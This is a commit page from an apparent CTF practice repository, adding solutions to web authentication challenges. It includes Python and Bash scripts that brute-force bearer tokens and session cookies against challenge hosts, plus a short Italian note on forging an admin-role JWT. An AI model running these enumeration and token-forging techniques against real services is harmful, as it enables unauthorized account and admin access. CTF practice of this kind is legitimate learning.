emln/OffSec-CTF
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Second CTFs part

Browse Source
This commit is contained in:
emln
2026-05-10 20:42:33 +02:00
parent 5635246581
commit 9f240eba3b
87 changed files with 404506 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

402692
web-auth/flagmail/finale_vero.txt Normal file
View File

File diff suppressed because it is too large Load Diff

14
web-auth/flagmail/force.py Normal file
View File

@@ -0,0 +1,14 @@
import os
import time
token = 1775846743002
payload = f"curl --path-as-is -i -s -k -X $'GET' \
-H $'Host: 4a095ba0-1b44-40a8-8ed1-f8d01aa27cf7.offsec.m0lecon.it:8001' -H $'Accept-Language: en-US,en;q=0.9' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36' -H $'Authorization: Bearer 1775846743002' -H $'Accept: */*' -H $'Referer: http://4a095ba0-1b44-40a8-8ed1-f8d01aa27cf7.offsec.m0lecon.it:8001/inbox' -H $'Accept-Encoding: gzip, deflate, br' -H $'Connection: keep-alive' \
$'http://4a095ba0-1b44-40a8-8ed1-f8d01aa27cf7.offsec.m0lecon.it:8001/api/inbox'"
# os.system(f"{payload} | grep 'messages'")
for i in range(60 * 999):
num = 1775844960000 + i
payload = f"curl --path-as-is -i -s -k -X $'GET' \
-H $'Host: 4a095ba0-1b44-40a8-8ed1-f8d01aa27cf7.offsec.m0lecon.it:8001' -H $'Accept-Language: en-US,en;q=0.9' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36' -H $'Authorization: Bearer {num}' -H $'Accept: */*' -H $'Referer: http://4a095ba0-1b44-40a8-8ed1-f8d01aa27cf7.offsec.m0lecon.it:8001/inbox' -H $'Accept-Encoding: gzip, deflate, br' -H $'Connection: keep-alive' \
$'http://4a095ba0-1b44-40a8-8ed1-f8d01aa27cf7.offsec.m0lecon.it:8001/api/inbox'"
os.system(f"echo 'Date: \n{num}\n' && {payload}")

1
web-auth/keyvault/RsaCtfTool Submodule

Submodule web-auth/keyvault/RsaCtfTool added at e261e73888

16
web-auth/keyvault/convert.py Normal file
View File

@@ -0,0 +1,16 @@
import base64
# Example Base64 encoded N value
b64_n = "33dSdlKWda7L8qG94uQHfd21KnwjnbyCyMj44gTS5olb7Aejqsu8fB2lzNJhpWf6bDpFQ3iAWIXjuDQLPHGnQqHasDPEcJdlcQOJn6Sqgj2PnbuE2bBASXEefzjssDJyiZdqMWGRp41E_TlqUcoShkMjf95N_4KlvjsOTb9I99iAA3ouTWcfHA4N7Ln3fzL-BNYlVtbxTCCT-u4kyC0HewrNltZVNiJPV-FxH9FVKvqZQIv-ZCM6EgnXnU9broBZEENIEK02yYvyjqxwPnku96J4MdDItY9qyiNTzSNkHyNK0ds-kagMLT2EP7mR2EAryCv0ZDgJKQlIw4xYH91MKQ"
# 1. Decode the string
# If it's standard Base64:
# n_bytes = base64.urlsafe_b64decode(b64_n)
# If it's Base64URL (common in JWKs):
n_bytes = base64.urlsafe_b64decode(b64_n + "==")
# 2. Convert bytes to integer (Big-Endian)
n_integer = int.from_bytes(n_bytes, byteorder="big")
print(f"Integer Value: {n_integer}")

BIN
web-auth/neonarcade/forge_jwt.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 326 KiB

BIN
web-auth/neonarcade/get_flag.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 140 KiB

2
web-auth/neonarcade/writeup Normal file
View File

@@ -0,0 +1,2 @@
- Aggiornando da settings posso fare delle POST generando qualsiasi token voglio (firmato dal server)
- Faccio una post con role=admin invece che role=player e dopo lo mando a /operator trovando la flag.

6
web-auth/too_small/cookie-output.txt Normal file
View File

@@ -0,0 +1,6 @@
# Netscape HTTP Cookie File
# https://curl.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
too-small-reminder.challs.olicyber.it FALSE / FALSE 0 session_id 1337

8
web-auth/too_small/force.sh Executable file
View File

@@ -0,0 +1,8 @@
#!/bin/bash
for i in $(seq 1 9999);
do
echo "Session id=$i"
curl -b "session_id=$i" http://too-small-reminder.challs.olicyber.it/admin
done